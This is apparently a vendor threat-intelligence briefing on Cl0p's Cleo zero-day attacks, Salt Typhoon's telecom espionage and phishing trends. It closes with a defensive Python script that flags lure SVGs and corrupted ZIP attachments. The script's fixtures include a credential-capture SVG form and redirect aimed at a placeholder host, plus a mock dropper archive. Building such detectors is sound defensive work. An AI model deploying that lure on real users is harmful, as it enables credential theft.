Threat Context Monthly: Executive intelligence briefing for December 2024
Welcome to the Threat Context Monthly blog series where we provide a comprehensive roundup of the most relevant cybersecurity news and threat information from KrakenLabs, Outpost24’s cyber threat intelligence team. Here’s what you need to know from December.
Threat actor of the month: Cl0p
“Cl0p” is a financially motivated ransomware group, active since 2016, that runs double-extortion campaigns: it not only encrypts the victim’s systems but also threatens to publish stolen data on its Data Leak Site (DLS), dubbed CL0P^_- LEAKS. Phishing was the group’s original initial access vector, but its tradecraft has evolved towards exploiting vulnerable, internet-exposed software as the way in, either to deploy Clop ransomware or to drop other payloads, such as Truebot, DEWMODE, or LEMURLOOT, used to exfiltrate data from victims.
In December 2024 the group claimed responsibility for exploiting zero-day vulnerabilities in Cleo’s managed file transfer products Harmony, VLTrader, and LexiCom. Leveraging the flaws tracked as CVE-2024-50623 and CVE-2024-55956, Cl0p gained remote access to victim networks and deployed a backdoor dubbed Malichus to steal data. Malichus consists of a PowerShell loader, a Java downloader, and a modular Java framework that provides file exfiltration, command execution, and persistence over custom C2 protocols.
Since 2020, Cl0p has focused on exploiting vulnerabilities in secure file transfer solutions, hitting Accellion FTA, SolarWinds Serv-U, GoAnywhere MFT, and MOVEit Transfer in turn. This tactic has enabled mass data theft: the MOVEit campaign alone affected over 2,700 organizations in 2023. The latest campaign against Cleo confirms the group’s expertise at using zero-days to break into corporate networks and exfiltrate sensitive data.
In a statement on its DLS, Cl0p confirmed responsibility for the Cleo attacks and announced it would delete data from older breaches to focus on the new victims. Its extortion activity has drawn the attention of US authorities, which have offered a $10 million reward for information linking Cl0p’s activities to a foreign government. The scale of the Cleo breach remains unclear, but, as happened with MOVEit, the incident could affect hundreds of organizations.
Spotlight threat: Salt Typhoon compromises telco companies
“Salt Typhoon” is a highly skilled Chinese APT, active since around mid-2019, that has historically targeted government entities, telecom companies, and the hospitality sector. For initial access the group aggressively targets the victim’s public-facing servers, exploiting known remote code execution (RCE) vulnerabilities in Microsoft Exchange, Microsoft SharePoint, Apache, and Oracle Opera. Post-compromise, it combines living-off-the-land binaries (ProcDump) and open-source tools (Mimikatz) with custom backdoors (SparrowDoor) and a kernel-mode rootkit (Demodex).
In October 2024, the FBI and CISA released a joint statement confirming they were investigating unauthorized access to commercial telecommunications infrastructure by actors affiliated with the People’s Republic of China (PRC). The statement followed a Wall Street Journal report that US broadband providers including Verizon, AT&T, and Lumen Technologies had been breached by the Chinese hacking group tracked as Salt Typhoon.
In a second statement, on November 13, the agencies confirmed the espionage objective. Access to these telecommunications companies enabled the theft of customer call records, the compromise of private communications of individuals involved in government or political activity, and the copying of information subject to US law enforcement requests pursuant to court orders. In an interview with The Washington Post, a senior US senator reportedly described the attack as the “worst telecom hack in our nation’s history - by far”, with the attackers able to listen in on audio calls in real time and, in some cases, to pivot from one telecom network to another by exploiting trust relationships between carriers.
On December 3, government agencies from the US, the UK, Australia, and Canada (which also confirmed it had been affected) jointly released a guide for network engineers and defenders of communications infrastructure, with best practices to strengthen visibility and harden network devices against exploitation. The next day, the US agencies held a classified briefing for senators on the issue and, in a call with reporters, confirmed they had been investigating the intrusions since last spring and that questions remained open, including the full extent of the breach.
KrakenLabs observed highlights
Law enforcement operations
Ransomware affiliate arrested: Russian authorities have arrested Mikhail Pavlovich Matveev (also known as “Wazawaka”), a ransomware affiliate, and charged him with developing malware and with his role in several hacking groups. Learn more →
LockBit developer pending extradition: An Israeli court has detained Rostislav Panev, an alleged malware developer who worked for the LockBit ransomware group since 2019, and is reviewing a US extradition request for him. Learn more →
Trends
Domain abuse: Cloudflare’s legitimate web development and deployment domains (Pages and Workers) are increasingly abused by cybercriminals for phishing redirects, phishing pages, and targeted email lists. Because of Cloudflare’s reputation, the fraudulent content is not flagged by security products, so attackers can lead victims to it unhindered. Learn more →
SVG as phishing vector: Attackers are using various techniques to evade detection in phishing campaigns, such as Scalable Vector Graphics (SVG) attachments that render phishing forms or deploy malware, and ZIP archives or Office files deliberately corrupted so that security scanners cannot parse them while the recipient’s application still opens them. Learn more →
Phishing via fake weather app: Switzerland’s National Cyber Security Centre (NCSC) has issued an alert about citizens receiving physical letters, purportedly from MeteoSwiss, asking them to download a new “Severe Weather Warning App” via a QR code. Scanning the code leads to the download of the Android malware known as “Coper”. Learn more →
Worrying increase in vulnerabilities: Microsoft’s Patch Tuesday releases in 2024 addressed over 1,000 CVEs, the second-highest annual count in the program’s 21-year history. The year was particularly challenging, with 22 zero-day vulnerabilities, of which 36.4% (8 of 22) were Elevation of Privilege (EoP) flaws, a class often exploited by APT actors. Learn more →
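The SVG and corrupted-archive tricks described under “SVG as phishing vector” can be caught at the mail gateway by inspecting attachment content instead of trusting the extension: an image has no business carrying script, event handlers, HTML forms or outbound links, and an archive whose central directory is missing is one a scanner cannot open but a forgiving client may still recover. The Python script below is an added example written for this briefing; it is not KrakenLabs or Outpost24 tooling. The sample SVG and ZIP inputs are constructed inline, and the `example.invalid` URLs are placeholders.

```python
"""Attachment triage for the SVG and corrupted-archive evasion tricks.
Added example for this briefing, not Outpost24/KrakenLabs tooling.
All sample inputs below are constructed for illustration."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # prefer defusedxml when parsing untrusted mail at scale

SUSPICIOUS_MEMBER_EXT = (".js", ".vbs", ".exe", ".lnk", ".hta", ".svg", ".iso")
URL_SCHEME = re.compile(r"(?i)^\s*(https?:|javascript:|data:)")


def inspect_svg(data: bytes) -> list[str]:
    """Return reasons an SVG attachment looks like a phishing lure."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["svg: not well-formed XML"]
    for el in root.iter():
        if not isinstance(el.tag, str):  # skip comments / processing instructions
            continue
        tag = el.tag.split("}")[-1].lower()  # drop the XML namespace prefix
        if tag == "script":
            findings.append("svg: embedded <script>")
        elif tag == "foreignobject":
            findings.append("svg: <foreignObject> (can host HTML content)")
        elif tag == "form":
            findings.append("svg: embedded HTML <form> (credential capture)")
        for attr, val in el.attrib.items():
            name = attr.split("}")[-1].lower()
            if name.startswith("on"):  # onload=, onclick=, ... run script on render
                findings.append(f"svg: event handler {name}=")
            elif name in ("href", "action") and URL_SCHEME.match(val):
                findings.append(f"svg: outbound reference {val[:40]}")
    return findings


def inspect_zip(data: bytes) -> list[str]:
    """Return reasons a ZIP attachment looks evasive or dangerous."""
    findings = []
    if not zipfile.is_zipfile(io.BytesIO(data)):
        if data.startswith(b"PK\x03\x04"):
            # local file header present but central directory / EOCD gone:
            # scanners give up, recovery-capable archivers still extract it
            return ["zip: central directory missing or corrupt (scanner-evasion pattern)"]
        return ["zip: not a ZIP archive"]
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            bad = zf.testzip()  # first member with a CRC mismatch, if any
            if bad:
                findings.append(f"zip: CRC failure in {bad}")
            for info in zf.infolist():
                if info.filename.lower().endswith(SUSPICIOUS_MEMBER_EXT):
                    findings.append(f"zip: executable-like member {info.filename}")
    except zipfile.BadZipFile as exc:
        findings.append(f"zip: unreadable archive ({exc})")
    return findings


def triage(filename: str, data: bytes) -> list[str]:
    """Dispatch on extension; other attachment types are passed through."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext == "svg":
        return inspect_svg(data)
    if ext == "zip":
        return inspect_zip(data)
    return []


def make_zip(members: dict) -> bytes:
    """Build an in-memory ZIP from {name: bytes} (fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def corrupt_zip(data: bytes) -> bytes:
    """Strip everything from the first central directory header onward,
    mimicking the deliberately 'unscannable' archives."""
    return data[: data.rfind(b"PK\x01\x02")]


# Constructed samples (not real attachments)
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'
LURE_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg">'
    b'<foreignObject width="400" height="300">'
    b'<body xmlns="http://www.w3.org/1999/xhtml">'
    b'<form action="https://example.invalid/login"><input name="pw"/></form>'
    b'</body></foreignObject>'
    b'<script>window.location="https://example.invalid/dl"</script></svg>'
)

if __name__ == "__main__":
    samples = {
        "chart.svg": BENIGN_SVG,
        "invoice.svg": LURE_SVG,
        "report.zip": make_zip({"report.txt": b"quarterly figures"}),
        "scan.zip": make_zip({"scan.pdf.js": b"// dropper"}),
        "docs.zip": corrupt_zip(make_zip({"docs.docx": b"x" * 64})),
    }
    for fname, blob in samples.items():
        print(fname, "->", triage(fname, blob) or "clean")
```

The point of the ZIP check is that a plain "could not scan, pass through" policy is exactly what the corrupted-attachment trick relies on; an archive that starts with a local file header but has no central directory should be quarantined, not waved through.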
Ransomware
Ransomware vs industrial sectors: RansomHub was the most active group against industrial sectors in the third quarter of 2024, with 90 incidents (16% of all activity), while LockBit 3.0 maintained a strong presence despite operational disruptions. The quarter saw the emergence of 20 new ransomware groups, including APT73, Fog, and Helldown, illustrating how dynamic the ecosystem is. Learn more →
What’s new in Threat Context this month?
Threat actors: Termite, ImpactSolutions, Chort Group, SafePay, Hive0145, Helldown, Hellcat, LogsDiller, Muddling Meerkat, Scribble Hemlock, Bluebox, Gamenode Hemlock, Abyssal Hemlock, Frag, YT&TEAM, Argonauts Group, Fatherofcarders, CyberVolk.
Tools: DeepData, WezRat, Craxs Rat, SafePay ransomware, Braodo Stealer, RingQ, Helldown, GloveStealer, BabbleLoader, NodeLoader, Gabagool, ChortLocker, Termite ransomware plus more!
Try Threat Compass for yourself
Want more threat intel? Get started with Threat Compass to receive the latest actionable intelligence from our world-class in-house analyst team. Request a live demo here.